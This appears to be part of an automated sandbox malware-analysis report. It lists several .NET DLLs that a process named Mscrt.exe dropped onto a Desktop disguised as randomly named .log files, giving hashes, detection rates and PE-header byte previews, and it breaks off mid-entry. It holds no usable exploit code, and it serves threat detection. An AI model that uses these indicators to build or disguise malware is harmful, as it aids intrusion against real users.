SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\TaRdOVJt.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\TrGcehJI.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WUTtFVnj.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XIYBqjjh.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XMmLkVMA.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XqUSVQdy.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\aLKjMSnc.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cAEKMRbo.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cNwShBsX.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kPeZMpiY.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lwQiRexF.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\mmsihreI.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nkUqDrtD.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oFVQTmjS.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ohvyYrIy.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pVzGKFEw.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\peXGurXs.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\rNSZpEdN.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rvLGajjL.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tPFHKnhJ.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uMgPgnwD.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vDJPwBdH.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
